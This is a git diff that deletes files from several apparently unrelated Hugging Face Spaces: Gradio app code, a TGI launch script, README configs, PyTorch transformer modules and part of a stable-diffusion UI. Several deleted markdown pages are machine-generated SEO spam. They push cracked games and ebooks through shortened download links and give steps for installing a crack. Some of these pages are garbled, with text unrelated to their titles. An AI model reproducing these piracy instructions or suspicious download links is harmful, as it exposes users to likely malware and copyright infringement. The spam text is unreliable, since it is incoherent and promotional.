    ") - gr.Markdown("

    Trigger Channel Results

    ") - table_tc = gr.Dataframe(headers=["No.","Trigger Channel", "Description"], row_count=1) - - with gr.Box(): - with gr.Column(): - - gr.Markdown("

    Step 2: Generate Trigger Functions

    ") - dropdown_tc = gr.Dropdown(label="Select the Trigger Channel",type="value", choices=['']) - textbox_selected_tc = gr.Textbox(value="", visible=False, label="") - button_generate_tf = gr.Button("Generate Trigger Functions") - - gr.Markdown("
    ") - gr.Markdown("

    Trigger Function Results

    ") - table_tf = gr.Dataframe(headers=["No.","Trigger Function", "Description"], row_count=1) - - with gr.Box(): - with gr.Column(): - - gr.Markdown("

    Step 3: Generate Action Channels

    ") - dropdown_tf = gr.Dropdown(label="Select the Trigger Function",type="value", choices=['']) - textbox_selected_tf = gr.Textbox(value="", visible=False, label="") - button_generate_ac = gr.Button("Generate Action Channels") - - gr.Markdown("
    ") - gr.Markdown("

    Action Channel Results

    ") - table_ac = gr.Dataframe(headers=["No.","Action Channel", "Description"], row_count=1) - - with gr.Box(): - with gr.Column(): - gr.Markdown("

    Step 4: Generate Action Functions

    ") - dropdown_ac = gr.Dropdown(label="Select the Action Channel",type="value", choices=['']) - textbox_selected_ac = gr.Textbox(value="", visible=False, label="") - - button_generate_af = gr.Button("Generate Action Functions") - gr.Markdown("
    ") - gr.Markdown("

    Action Function Results

    ") - table_af = gr.Dataframe(headers=["No.","Action Function", "Description"], row_count=1) - - with gr.Box(): - with gr.Column(): - gr.Markdown("

    Step 5: Generate the Final TAP

    ") - dropdown_af = gr.Dropdown(label="Select the Action Function",type="value", choices=['']) - table_final = gr.Dataframe(headers=["Trigger","Action"], row_count=1) - - button_use_example.click(return_same, inputs=[dropdown_example], outputs=[textbox_input]) - button_use_example.click(generate_preds_tc, inputs=[dropdown_example, n_beams_interactive], outputs=[table_tc]) - button_generate_tc.click(generate_preds_tc, inputs=[textbox_input, n_beams_interactive], outputs=[table_tc]) - - table_tc.change(fn=update_dropdown_trig_ch, inputs=[table_tc], outputs=[dropdown_tc]) - dropdown_tc.change(fn=set_trigger_ch, inputs=[table_tc,dropdown_tc], outputs=[textbox_selected_tc]) - button_generate_tf.click(generate_preds_tf, inputs=[textbox_input, n_beams_interactive, textbox_selected_tc], outputs=[table_tf]) - - table_tf.change(fn=update_dropdown_trig_func, inputs=[table_tf], outputs=[dropdown_tf]) - dropdown_tf.change(fn=set_trig_func, inputs=[table_tf,dropdown_tf], outputs=[textbox_selected_tf]) - button_generate_ac.click(generate_preds_ac, inputs=[textbox_input, n_beams_interactive, textbox_selected_tc, textbox_selected_tf], outputs=[table_ac]) - - table_ac.change(fn=update_dropdown_action_ch, inputs=[table_ac], outputs=[dropdown_ac]) - dropdown_ac.change(fn=set_action_ch, inputs=[table_ac,dropdown_ac], outputs=[textbox_selected_ac]) - button_generate_af.click(generate_preds_af, inputs=[textbox_input, n_beams_interactive, textbox_selected_tc, textbox_selected_tf, textbox_selected_ac], outputs=[table_af]) - - table_af.change(fn=update_dropdown_action_func, inputs=[table_af], outputs=[dropdown_af]) - dropdown_af.change(fn=set_final_result, inputs=[textbox_selected_tf, table_af, dropdown_af], outputs=[table_final]) - - with gr.TabItem("One-Click"): - gr.Markdown("

    Instructions for One-Click Mode

    ") - gr.Markdown(""" - 1. Describe the functionality by yourself in the `Functionality Description` text box - 2. Click `Generate TAP` button. The TAP candidates will show up in the `TAP Results` table. The table consists of 4 columns: Trigger, Action, Trigger Description, and Action Description. You can scroll the table horizontally. - """) - gr.Markdown(""" NOTE: You can control how many sequences are returned by tuning the `Beam Width` slider. A larger value will cause a longer generation time.""") - - with gr.Box(): - with gr.Column(): - gr.Markdown("You can describe your own functionality directly in the `Functionality Description` text box or try a description sample from the dropdown below:") - dropdown_example = gr.Dropdown(type ="value", - choices = ["Log to my spreadsheet if motion is detected in the living room","When I am not home, let me know when any motion is detected in my house", "Turn on my Philips lamp every sunset","Update my picture in Twitter when I change my profile picture in Facebook","Save in notes when I create a new bookmark"], - label = "Select a sample functionality description") - button_use_example = gr.Button("Try this sample") - - with gr.Box(): - with gr.Column(): - textbox_input = gr.Textbox(label="Functionality Description", placeholder="Describe the functionality here") - n_beams_oneshot = gr.Slider(minimum=2, maximum=100, value=20, step=1, label="Beam Width") - button_generate_oneshot = gr.Button("Generate TAPs") - - gr.Markdown("
    ") - gr.Markdown("

    TAP Results

    ") - table_oneshot = gr.Dataframe(headers=["Trigger", "Action", "Trigger Description", "Action Description"], row_count=1) - - button_use_example.click(return_same, inputs=[dropdown_example], outputs=[textbox_input]) - button_use_example.click(generate_oneshot, inputs=[dropdown_example, n_beams_oneshot], outputs=[table_oneshot]) - button_generate_oneshot.click(generate_oneshot, inputs=[textbox_input, n_beams_oneshot], outputs=[table_oneshot]) - - with gr.TabItem("Functionality Discovery"): - gr.Markdown("

    Instructions for Functionality Discovery Mode

    ") - gr.Markdown(""" - 1. Describe the functionality in the `Functionality Description` text box. - 2. Click `Discover Functionalities` button. The table containing relevant trigger and action channels will show up. Each channel is accompanied by a list of available functionalities. You can scroll the table horizontally. - """) - gr.Markdown(""" NOTE: You can control how many sequences are returned by tuning the `Beam Width` slider. A larger value will cause a longer generation time.""") - - with gr.Box(): - with gr.Column(): - gr.Markdown("You can describe your own functionality directly in the `Functionality Description` text box or try a description sample from the dropdown below:") - dropdown_example = gr.Dropdown(type ="value", - choices = ["Log to my spreadsheet if motion is detected in the living room","When I am not home, let me know when any motion is detected in my house", "Turn on my Philips lamp every sunset","Update my picture in Twitter when I change my profile picture in Facebook","Save in notes when I create a new bookmark"], - label = "Select a sample functionality description") - button_use_example = gr.Button("Try this sample") - - with gr.Box(): - with gr.Column(): - textbox_input = gr.Textbox(label="Functionality Description", placeholder="Describe the functionality here") - n_beams_discover = gr.Slider(minimum=2, maximum=100, value=20, step=1, label="Beam Width") - button_discover_function = gr.Button("Discover Functions!") - - gr.Markdown("
    ") - gr.Markdown("

    Relevant Trigger Channels and Functionalities

    ") - table_discover_tc = gr.Dataframe(headers=["Trigger", "Available Functions", "Trigger Description"], row_count=1) - - gr.Markdown("
    ") - gr.Markdown("

    Relevant Action Channels and Functionalities

    ") - table_discover_ac = gr.Dataframe(headers=["Action", "Available Functions", "Action Description"], row_count=1) - - button_use_example.click(return_same, inputs=[dropdown_example], outputs=[textbox_input]) - button_use_example.click(generate_channel, inputs=[dropdown_example, n_beams_discover], outputs=[table_discover_tc, table_discover_ac]) - button_discover_function.click(generate_channel, inputs=[textbox_input, n_beams_discover], outputs=[table_discover_tc, table_discover_ac]) - -demo.launch() \ No newline at end of file diff --git a/spaces/inamXcontru/PoeticTTS/Bibliotheque5000LivresREPACKFRENCHEBOOKEPUBAlexandriz La plus grande collection de livres numriques en franais.md b/spaces/inamXcontru/PoeticTTS/Bibliotheque5000LivresREPACKFRENCHEBOOKEPUBAlexandriz La plus grande collection de livres numriques en franais.md deleted file mode 100644 index 25b6325647332c25b5c548f78d9e033f91ad17db..0000000000000000000000000000000000000000 --- a/spaces/inamXcontru/PoeticTTS/Bibliotheque5000LivresREPACKFRENCHEBOOKEPUBAlexandriz La plus grande collection de livres numriques en franais.md +++ /dev/null @@ -1,6 +0,0 @@ -

    Bibliotheque5000LivresREPACKFRENCHEBOOKEPUBAlexandriz


    Download Zip ✵✵✵ https://gohhs.com/2uz3Iv



    -
    - aaccfb2cb3
    -
    -
    -

    diff --git a/spaces/inflaton/learn-ai/tgi.sh b/spaces/inflaton/learn-ai/tgi.sh deleted file mode 100644 index ebbc11bba5c7be51b2162af6c770840d532fcbea..0000000000000000000000000000000000000000 --- a/spaces/inflaton/learn-ai/tgi.sh +++ /dev/null @@ -1,15 +0,0 @@ -#!/bin/sh - -BASEDIR=$(dirname "$0") -cd $BASEDIR -echo Current Directory: -pwd - -uname -a - -. env/tgi.conf - -echo Running $MODEL_ID with TGI - -text-generation-launcher --model-id $MODEL_ID --port $PORT --max-input-length 2048 --max-total-tokens 4096 --ngrok --ngrok-authtoken $NGROK_AUTHTOKEN --ngrok-edge $NGROK_EDGE $QUANTIZE - diff --git a/spaces/inplisQlawa/anything-midjourney-v4-1/Alaskan Truck Simulator Crack [2021].md b/spaces/inplisQlawa/anything-midjourney-v4-1/Alaskan Truck Simulator Crack [2021].md deleted file mode 100644 index 3e2cfa3e0cf0b73c88984045b8c19a239c78cd12..0000000000000000000000000000000000000000 --- a/spaces/inplisQlawa/anything-midjourney-v4-1/Alaskan Truck Simulator Crack [2021].md +++ /dev/null @@ -1,59 +0,0 @@ -
    -

    Alaskan Truck Simulator Crack: A Unique and Challenging Game

    -

    If you are looking for a realistic and immersive simulation game that will test your driving skills and survival instincts, you should try Alaskan Truck Simulator crack. This game is a blend of the well-known simulators' classics with the ruthless environment of Alaska and elements of survival. You will have to drive a truck across the entire state, facing changing weather, snow, uneven roads, and harsh climate. You will also have to take care of your truck's condition and your own basic needs, such as hunger, fatigue, and fuel. Alaskan Truck Simulator crack is a game that will give you a proper adventure and a sense of accomplishment.

    - -

    How to Download Alaskan Truck Simulator Crack

    -

    Alaskan Truck Simulator crack is available for free download from various websites that offer cracked PC games. You can find the links to these websites by searching for "Alaskan Truck Simulator crack" on any search engine. However, you should be careful when downloading cracked games, as they may contain viruses or malware that can harm your computer. You should also use a VPN service to protect your privacy and avoid any legal issues. Alternatively, you can buy the original game from the official website or Steam and support the developers.

    -

    Alaskan Truck Simulator crack


    Download File –––––>>> https://urlin.us/2uEyPW



    - -

    How to Install Alaskan Truck Simulator Crack

    -

    Installing Alaskan Truck Simulator crack is not very difficult, but you need to follow some steps carefully. First, you need to extract the downloaded file using a program like WinRAR or 7-Zip. Then, you need to run the setup file and follow the instructions on the screen. After that, you need to copy the crack file from the folder named "CPY" or "SKIDROW" and paste it into the game's installation folder. Finally, you need to run the game as administrator and enjoy.

    - -

    How to Play Alaskan Truck Simulator Crack

    -

    Playing Alaskan Truck Simulator crack is a fun and challenging experience that will make you feel like a real truck driver in Alaska. You will have to choose your truck model, customize it, and load it with cargo. Then, you will have to drive across various locations in Alaska, such as Anchorage, Fairbanks, Juneau, Denali National Park, and more. You will have to deal with different weather conditions, such as snowstorms, blizzards, rain, fog, and wind. You will also have to avoid obstacles on the road, such as animals, rocks, trees, and other vehicles. You will have to monitor your truck's status, such as fuel level, tire pressure, engine temperature, and damage. You will also have to take care of your own needs, such as eating, sleeping, and staying warm.

    - -
    Why You Should Try Alaskan Truck Simulator Crack
    -

    Alaskan Truck Simulator crack is a game that will appeal to anyone who loves simulation games and adventure games. It is a game that will challenge your driving skills and your survival skills. It is a game that will immerse you in a realistic and beautiful environment of Alaska. It is a game that will make you feel like you are living an adventure of a lifetime. Alaskan Truck Simulator crack is a game that you should not miss.

    -
    What to Expect from Alaskan Truck Simulator Crack
    -

    Alaskan Truck Simulator crack is a game that will offer you a lot of features and content to enjoy. You will be able to experience the wildness of Alaska like never before, with stunning graphics and realistic sounds. You will be able to explore different locations and landmarks, such as Anchorage, Fairbanks, Juneau, Denali National Park, and more. You will be able to choose from various cargo types and missions, such as delivering food, fuel, lumber, or mail. You will be able to interact with other characters and events, such as wildlife encounters, road accidents, or police patrols. You will be able to customize your truck and your character, with different outfits, accessories, and skills. You will be able to play the game in different modes, such as career mode, free roam mode, or multiplayer mode.

    - -How to Enjoy Alaskan Truck Simulator Crack -

    Alaskan Truck Simulator crack is a game that will provide you with hours of fun and entertainment. However, you need to follow some tips and tricks to make the most out of it. Here are some of them:

    -
      -
    • Plan your route carefully. Alaska is a huge state with many roads and paths to choose from. You need to consider the distance, the terrain, the weather, and the traffic before you start your journey. You also need to check your map and GPS regularly to avoid getting lost or stuck.
    • -
    • Manage your resources wisely. Alaska is a harsh place with limited resources. You need to keep an eye on your fuel level, your tire pressure, your engine temperature, and your damage. You also need to take care of your own needs, such as eating, sleeping, and staying warm. You need to find places to refuel, repair, restock, or rest along the way.
    • -
    • Be prepared for anything. Alaska is a wild place with many surprises and dangers. You need to be ready for anything that can happen on the road, such as snowstorms, blizzards, rain, fog, wind, animals, rocks, trees, other vehicles, or even avalanches. You need to have the right tools and equipment for any situation, such as snow chains, winches, flares, or fire extinguishers.
    • -
    • Have fun and enjoy the scenery. Alaska is a beautiful place with many wonders and attractions. You need to take some time to appreciate the scenery and take some pictures along the way. You also need to have fun and enjoy the adventure of driving a truck across The Last Frontier.
    • -
    - -

    Alaskan Truck Simulator crack is a game that will give you an unforgettable experience of trucking in Alaska. It is a game that will challenge you and reward you at the same time. It is a game that you should try if you love simulation games and adventure games.

    -

    -When to Expect Alaskan Truck Simulator Crack -

    Alaskan Truck Simulator crack is a game that many simulation and adventure fans are eagerly waiting for. However, the game is still in development and has not yet been released. The official release date of Alaskan Truck Simulator is 7 December 2022, according to some sources. However, this date may change depending on the progress of the development and testing. The game is planned to be released on PC and consoles, such as PlayStation 4 and Xbox One. You can follow the game's official website or Steam page to get the latest updates and news about the game's release date and features.

    - -How to Get Alaskan Truck Simulator Crack for Free -

    Alaskan Truck Simulator crack is a game that will cost you some money if you want to buy the original version from the official website or Steam. However, if you want to get the game for free, you can try to download Alaskan Truck Simulator crack from various websites that offer cracked PC games. You can find these websites by searching for "Alaskan Truck Simulator crack" on any search engine. However, you should be aware of the risks and disadvantages of downloading cracked games. First of all, cracked games may contain viruses or malware that can harm your computer or steal your personal information. Second, cracked games may not work properly or have bugs and glitches that can ruin your gaming experience. Third, cracked games may not have access to online features or updates that can enhance your gameplay. Fourth, cracked games may be illegal in some countries and regions, and you may face legal consequences if you download them. Therefore, we recommend that you buy the original game from the official website or Steam and support the developers.

    -How to Try Alaskan Truck Simulator Crack for Free -

    Alaskan Truck Simulator crack is a game that you may want to try before you buy it. Fortunately, there is a way to do that without downloading any cracked files. You can try the official Alaskan Truck Simulator demo for free on Steam. The demo will let you experience a sample of the game's features and content, such as driving a truck across Alaska, dealing with weather and terrain, and managing your resources. The demo will also give you a glimpse of the game's graphics and sounds, which are designed to create a realistic and immersive environment. The demo is available for download on Steam right now, and you can play it as long as you want. However, the demo is not the full game, and it may not reflect the final quality and performance of the game. Therefore, if you want to enjoy the complete Alaskan Truck Simulator experience, you will need to buy the original game from the official website or Steam.

    - -What People Are Saying About Alaskan Truck Simulator Crack -

    Alaskan Truck Simulator crack is a game that has generated a lot of interest and excitement among simulation and adventure fans. Many people have tried the game's demo or watched its gameplay trailers and have shared their opinions and feedback on various platforms, such as Steam, YouTube, or social media. Here are some of the comments that people have made about Alaskan Truck Simulator crack:

    -
    -

    "This looks amazing! I love truck simulators and survival games, and this seems to combine both genres in a unique way. I can't wait to play this!"

    -
    -
    -

    "Wow, this game looks so realistic and beautiful. The graphics and sounds are incredible. I feel like I'm actually in Alaska."

    -
    -
    -

    "This game is so challenging and fun. The weather and terrain are unpredictable and dangerous. You have to be careful and prepared for anything. It's not just driving a truck, it's surviving in Alaska."

    -
    -
    -

    "This game is awesome! I love the customization options for the trucks and the character. I also love the open world and the landmarks. There's so much to explore and discover."

    -
    -

    As you can see, Alaskan Truck Simulator crack is a game that has received a lot of positive feedback and praise from players who have tried it or watched it. It is a game that promises to deliver a unique and immersive experience of trucking in Alaska. It is a game that you should not miss.

    -Conclusion -

    Alaskan Truck Simulator crack is a game that will let you experience the wildness of Alaska like never before. It is a game that will blend the well-known simulator classics with elements of the survival genre. It is a game that will challenge your driving skills and your survival skills. It is a game that will immerse you in a realistic and beautiful environment of Alaska. It is a game that will make you feel like you are living an adventure of a lifetime.

    -

    If you want to try Alaskan Truck Simulator crack for free, you can download the official demo from Steam and play it as long as you want. However, if you want to enjoy the full Alaskan Truck Simulator experience, you will need to buy the original game from the official website or Steam and support the developers.

    -

    Alaskan Truck Simulator crack is a game that you should not miss if you love simulation games and adventure games. It is a game that will give you an unforgettable experience of trucking in Alaska. So what are you waiting for? Add Alaskan Truck Simulator to your wishlist and get ready for the ultimate trucking adventure!

    3cee63e6c2
    -
    -
    \ No newline at end of file diff --git a/spaces/inplisQlawa/anything-midjourney-v4-1/Cannot Find Script Dll X86 Rwdi.exe Dead Island Download !!TOP!!.md b/spaces/inplisQlawa/anything-midjourney-v4-1/Cannot Find Script Dll X86 Rwdi.exe Dead Island Download !!TOP!!.md deleted file mode 100644 index 6382ea5dfa3fdb0b58015298b093a9fefbf6f15b..0000000000000000000000000000000000000000 --- a/spaces/inplisQlawa/anything-midjourney-v4-1/Cannot Find Script Dll X86 Rwdi.exe Dead Island Download !!TOP!!.md +++ /dev/null @@ -1,12 +0,0 @@ -

    cannot find script dll x86 rwdi.exe dead island download


    DOWNLOADhttps://urlin.us/2uEx1b



    -
    -# **Printing** - -When you print a document, you make a copy of it and print it. When you print a page, you print the page without any modification. There are two ways to print: by printing directly from the application or by printing directly from a document. - -**Printing from an Application** - -You can print from Microsoft Word, Microsoft Excel, Microsoft PowerPoint, and so on. Print from any application by selecting File | Print. This opens the Print dialog box. In the Print dialog box, you can select the printer and the options for printing, as shown in Figure 6-7. Figure 6-7. The Print dialog box 4fefd39f24
    -
    -
    -

    diff --git a/spaces/inplisQlawa/anything-midjourney-v4-1/Cocinadelanarquistapdf [BETTER].md b/spaces/inplisQlawa/anything-midjourney-v4-1/Cocinadelanarquistapdf [BETTER].md deleted file mode 100644 index cc336d769070e5504a183976f1e08390c9b97f63..0000000000000000000000000000000000000000 --- a/spaces/inplisQlawa/anything-midjourney-v4-1/Cocinadelanarquistapdf [BETTER].md +++ /dev/null @@ -1,6 +0,0 @@ -

    cocinadelanarquistapdf


    Download ★★★★★ https://urlin.us/2uEyiT



    -
    -Third practice of statistics - Statistics - StuviaThe Practice Of Statistics 3rd EditionAmazon.com: The Practice of Statistics: TI-83/84/89 Third ... 1fdad05405
    -
    -
    -

    diff --git a/spaces/inplisQlawa/anything-midjourney-v4-1/Come Scaricare Naufraghi Minecraft Servers.md b/spaces/inplisQlawa/anything-midjourney-v4-1/Come Scaricare Naufraghi Minecraft Servers.md deleted file mode 100644 index 91d0d2abcf798c9b92bda4a7fffb8e37dcbdb9c7..0000000000000000000000000000000000000000 --- a/spaces/inplisQlawa/anything-midjourney-v4-1/Come Scaricare Naufraghi Minecraft Servers.md +++ /dev/null @@ -1,6 +0,0 @@ -

    come scaricare naufraghi minecraft servers


    DOWNLOAD https://urlin.us/2uExQT



    - - 4d29de3e1b
    -
    -
    -

    diff --git a/spaces/iruku/and/README.md b/spaces/iruku/and/README.md deleted file mode 100644 index a3a9c4bb8237f99f875744ce78ea2b8cbc3f49b0..0000000000000000000000000000000000000000 --- a/spaces/iruku/and/README.md +++ /dev/null @@ -1,11 +0,0 @@ ---- -title: And -emoji: 😻 -colorFrom: green -colorTo: red -sdk: docker -pinned: false -license: mit ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/isabel/club-project/README.md b/spaces/isabel/club-project/README.md deleted file mode 100644 index bd2dd956747ba88b6c80b91c43f6599dcbec78d8..0000000000000000000000000000000000000000 --- a/spaces/isabel/club-project/README.md +++ /dev/null @@ -1,37 +0,0 @@ ---- -title: Club Project -emoji: ⛳ -colorFrom: gray -colorTo: green -sdk: gradio -app_file: app.py -pinned: false ---- - -# Configuration - -`title`: _string_ -Display title for the Space - -`emoji`: _string_ -Space emoji (emoji-only character allowed) - -`colorFrom`: _string_ -Color for Thumbnail gradient (red, yellow, green, blue, indigo, purple, pink, gray) - -`colorTo`: _string_ -Color for Thumbnail gradient (red, yellow, green, blue, indigo, purple, pink, gray) - -`sdk`: _string_ -Can be either `gradio` or `streamlit` - -`sdk_version` : _string_ -Only applicable for `streamlit` SDK. -See [doc](https://hf.co/docs/hub/spaces) for more info on supported versions. - -`app_file`: _string_ -Path to your main application file (which contains either `gradio` or `streamlit` Python code). -Path is relative to the root of the repository. - -`pinned`: _boolean_ -Whether the Space stays on top of your list. diff --git a/spaces/ismot/1702t1/models/modules/transformer_modules.py b/spaces/ismot/1702t1/models/modules/transformer_modules.py deleted file mode 100644 index 475d5047e8b08d51e7a91ead1bf158f004698d08..0000000000000000000000000000000000000000 --- a/spaces/ismot/1702t1/models/modules/transformer_modules.py +++ /dev/null @@ -1,250 +0,0 @@ -""" -@Date: 2021/09/01 -@description: -""" -import warnings -import math -import torch -import torch.nn.functional as F - -from torch import nn, einsum -from einops import rearrange - - -def trunc_normal_(tensor, mean=0., std=1., a=-2., b=2.): - # Cut & paste from PyTorch official master until it's in a few official releases - RW - # Method based on https://people.sc.fsu.edu/~jburkardt/presentations/truncated_normal.pdf - def norm_cdf(x): - # Computes standard normal cumulative distribution function - return (1. + math.erf(x / math.sqrt(2.))) / 2. - - if (mean < a - 2 * std) or (mean > b + 2 * std): - warnings.warn("mean is more than 2 std from [a, b] in nn.init.trunc_normal_. " - "The distribution of values may be incorrect.", - stacklevel=2) - - with torch.no_grad(): - # Values are generated by using a truncated uniform distribution and - # then using the inverse CDF for the normal distribution. - # Get upper and lower cdf values - l = norm_cdf((a - mean) / std) - u = norm_cdf((b - mean) / std) - - # Uniformly fill tensor with values from [l, u], then translate to - # [2l-1, 2u-1]. - tensor.uniform_(2 * l - 1, 2 * u - 1) - - # Use inverse cdf transform for normal distribution to get truncated - # standard normal - tensor.erfinv_() - - # Transform to proper mean, std - tensor.mul_(std * math.sqrt(2.)) - tensor.add_(mean) - - # Clamp to ensure it's in the proper range - tensor.clamp_(min=a, max=b) - return tensor - - -class PreNorm(nn.Module): - def __init__(self, dim, fn): - super().__init__() - self.norm = nn.LayerNorm(dim) - self.fn = fn - - def forward(self, x, **kwargs): - return self.fn(self.norm(x), **kwargs) - - -# compatibility pytorch < 1.4 -class GELU(nn.Module): - def forward(self, input): - return F.gelu(input) - - -class Attend(nn.Module): - - def __init__(self, dim=None): - super().__init__() - self.dim = dim - - def forward(self, input): - return F.softmax(input, dim=self.dim, dtype=input.dtype) - - -class FeedForward(nn.Module): - def __init__(self, dim, hidden_dim, dropout=0.): - super().__init__() - self.net = nn.Sequential( - nn.Linear(dim, hidden_dim), - GELU(), - nn.Dropout(dropout), - nn.Linear(hidden_dim, dim), - nn.Dropout(dropout) - ) - - def forward(self, x): - return self.net(x) - - -class RelativePosition(nn.Module): - def __init__(self, heads, patch_num=None, rpe=None): - super().__init__() - self.rpe = rpe - self.heads = heads - self.patch_num = patch_num - - if rpe == 'lr_parameter': - # -255 ~ 0 ~ 255 all count : patch * 2 - 1 - count = patch_num * 2 - 1 - self.rpe_table = nn.Parameter(torch.Tensor(count, heads)) - nn.init.xavier_uniform_(self.rpe_table) - elif rpe == 'lr_parameter_mirror': - # 0 ~ 127 128 ~ 1 all count : patch_num // 2 + 1 - count = patch_num // 2 + 1 - self.rpe_table = nn.Parameter(torch.Tensor(count, heads)) - nn.init.xavier_uniform_(self.rpe_table) - elif rpe == 'lr_parameter_half': - # -127 ~ 0 ~ 128 all count : patch - count = patch_num - self.rpe_table = nn.Parameter(torch.Tensor(count, heads)) - nn.init.xavier_uniform_(self.rpe_table) - elif rpe == 'fix_angle': - # 0 ~ 127 128 ~ 1 all count : patch_num // 2 + 1 - count = patch_num // 2 + 1 - # we think that closer proximity should have stronger relationships - rpe_table = (torch.arange(count, 0, -1) / count)[..., None].repeat(1, heads) - self.register_buffer('rpe_table', rpe_table) - - def get_relative_pos_embed(self): - range_vec = torch.arange(self.patch_num) - distance_mat = range_vec[None, :] - range_vec[:, None] - if self.rpe == 'lr_parameter': - # -255 ~ 0 ~ 255 -> 0 ~ 255 ~ 255 + 255 - distance_mat += self.patch_num - 1 # remove negative - return self.rpe_table[distance_mat].permute(2, 0, 1)[None] - elif self.rpe == 'lr_parameter_mirror' or self.rpe == 'fix_angle': - distance_mat[distance_mat < 0] = -distance_mat[distance_mat < 0] # mirror - distance_mat[distance_mat > self.patch_num // 2] = self.patch_num - distance_mat[ - distance_mat > self.patch_num // 2] # remove repeat - return self.rpe_table[distance_mat].permute(2, 0, 1)[None] - elif self.rpe == 'lr_parameter_half': - distance_mat[distance_mat > self.patch_num // 2] = distance_mat[ - distance_mat > self.patch_num // 2] - self.patch_num # remove repeat > 128 exp: 129 -> -127 - distance_mat[distance_mat < -self.patch_num // 2 + 1] = distance_mat[ - distance_mat < -self.patch_num // 2 + 1] + self.patch_num # remove repeat < -127 exp: -128 -> 128 - # -127 ~ 0 ~ 128 -> 0 ~ 0 ~ 127 + 127 + 128 - distance_mat += self.patch_num//2 - 1 # remove negative - return self.rpe_table[distance_mat].permute(2, 0, 1)[None] - - def forward(self, attn): - return attn + self.get_relative_pos_embed() - - -class Attention(nn.Module): - def __init__(self, dim, heads=8, dim_head=64, dropout=0., patch_num=None, rpe=None, rpe_pos=1): - """ - :param dim: - :param heads: - :param dim_head: - :param dropout: - :param patch_num: - :param rpe: relative position embedding - """ - super().__init__() - - self.relative_pos_embed = None if patch_num is None or rpe is None else RelativePosition(heads, patch_num, rpe) - inner_dim = dim_head * heads - project_out = not (heads == 1 and dim_head == dim) - - self.heads = heads - self.scale = dim_head ** -0.5 - self.rpe_pos = rpe_pos - - self.attend = Attend(dim=-1) - self.to_qkv = nn.Linear(dim, inner_dim * 3, bias=False) - - self.to_out = nn.Sequential( - nn.Linear(inner_dim, dim), - nn.Dropout(dropout) - ) if project_out else nn.Identity() - - def forward(self, x): - b, n, _, h = *x.shape, self.heads - qkv = self.to_qkv(x).chunk(3, dim=-1) - q, k, v = map(lambda t: rearrange(t, 'b n (h d) -> b h n d', h=h), qkv) - - dots = einsum('b h i d, b h j d -> b h i j', q, k) * self.scale - - if self.rpe_pos == 0: - if self.relative_pos_embed is not None: - dots = self.relative_pos_embed(dots) - - attn = self.attend(dots) - - if self.rpe_pos == 1: - if self.relative_pos_embed is not None: - attn = self.relative_pos_embed(attn) - - out = einsum('b h i j, b h j d -> b h i d', attn, v) - out = rearrange(out, 'b h n d -> b n (h d)') - return self.to_out(out) - - -class AbsolutePosition(nn.Module): - def __init__(self, dim, dropout=0., patch_num=None, ape=None): - super().__init__() - self.ape = ape - - if ape == 'lr_parameter': - self.absolute_pos_embed = nn.Parameter(torch.zeros(1, patch_num, dim)) - trunc_normal_(self.absolute_pos_embed, std=.02) - - elif ape == 'fix_angle': - angle = torch.arange(0, patch_num, dtype=torch.float) / patch_num * (math.pi * 2) - self.absolute_pos_embed = torch.sin(angle)[..., None].repeat(1, dim)[None] - - def forward(self, x): - return x + self.absolute_pos_embed - - -class WinAttention(nn.Module): - def __init__(self, dim, win_size=8, shift=0, heads=8, dim_head=64, dropout=0., rpe=None, rpe_pos=1): - super().__init__() - - self.win_size = win_size - self.shift = shift - self.attend = Attention(dim, heads=heads, dim_head=dim_head, - dropout=dropout, patch_num=win_size, rpe=None if rpe is None else 'lr_parameter', - rpe_pos=rpe_pos) - - def forward(self, x): - b = x.shape[0] - if self.shift != 0: - x = torch.roll(x, shifts=self.shift, dims=-2) - x = rearrange(x, 'b (m w) d -> (b m) w d', w=self.win_size) # split windows - - out = self.attend(x) - - out = rearrange(out, '(b m) w d -> b (m w) d ', b=b) # recover windows - if self.shift != 0: - out = torch.roll(out, shifts=-self.shift, dims=-2) - - return out - - -class Conv(nn.Module): - def __init__(self, dim, dropout=0.): - super().__init__() - self.dim = dim - self.net = nn.Sequential( - nn.Conv1d(dim, dim, kernel_size=3, stride=1, padding=0), - nn.Dropout(dropout) - ) - - def forward(self, x): - x = x.transpose(1, 2) - x = torch.cat([x[..., -1:], x, x[..., :1]], dim=-1) - x = self.net(x) - return x.transpose(1, 2) diff --git a/spaces/jackli888/stable-diffusion-webui/modules/ui_common.py b/spaces/jackli888/stable-diffusion-webui/modules/ui_common.py deleted file mode 100644 index 21ebb0955eec9604d6d41c22eeb1541f70a82580..0000000000000000000000000000000000000000 --- a/spaces/jackli888/stable-diffusion-webui/modules/ui_common.py +++ /dev/null @@ -1,206 +0,0 @@ -import json -import html -import os -import platform -import sys - -import gradio as gr -import subprocess as sp - -from modules import call_queue, shared -from modules.generation_parameters_copypaste import image_from_url_text -import modules.images - -folder_symbol = '\U0001f4c2' # 📂 - - -def update_generation_info(generation_info, html_info, img_index): - try: - generation_info = json.loads(generation_info) - if img_index < 0 or img_index >= len(generation_info["infotexts"]): - return html_info, gr.update() - return plaintext_to_html(generation_info["infotexts"][img_index]), gr.update() - except Exception: - pass - # if the json parse or anything else fails, just return the old html_info - return html_info, gr.update() - - -def plaintext_to_html(text): - text = "

    " + "
    \n".join([f"{html.escape(x)}" for x in text.split('\n')]) + "

    " - return text - - -def save_files(js_data, images, do_make_zip, index): - import csv - filenames = [] - fullfns = [] - - #quick dictionary to class object conversion. Its necessary due apply_filename_pattern requiring it - class MyObject: - def __init__(self, d=None): - if d is not None: - for key, value in d.items(): - setattr(self, key, value) - - data = json.loads(js_data) - - p = MyObject(data) - path = shared.opts.outdir_save - save_to_dirs = shared.opts.use_save_to_dirs_for_ui - extension: str = shared.opts.samples_format - start_index = 0 - - if index > -1 and shared.opts.save_selected_only and (index >= data["index_of_first_image"]): # ensures we are looking at a specific non-grid picture, and we have save_selected_only - - images = [images[index]] - start_index = index - - os.makedirs(shared.opts.outdir_save, exist_ok=True) - - with open(os.path.join(shared.opts.outdir_save, "log.csv"), "a", encoding="utf8", newline='') as file: - at_start = file.tell() == 0 - writer = csv.writer(file) - if at_start: - writer.writerow(["prompt", "seed", "width", "height", "sampler", "cfgs", "steps", "filename", "negative_prompt"]) - - for image_index, filedata in enumerate(images, start_index): - image = image_from_url_text(filedata) - - is_grid = image_index < p.index_of_first_image - i = 0 if is_grid else (image_index - p.index_of_first_image) - - fullfn, txt_fullfn = modules.images.save_image(image, path, "", seed=p.all_seeds[i], prompt=p.all_prompts[i], extension=extension, info=p.infotexts[image_index], grid=is_grid, p=p, save_to_dirs=save_to_dirs) - - filename = os.path.relpath(fullfn, path) - 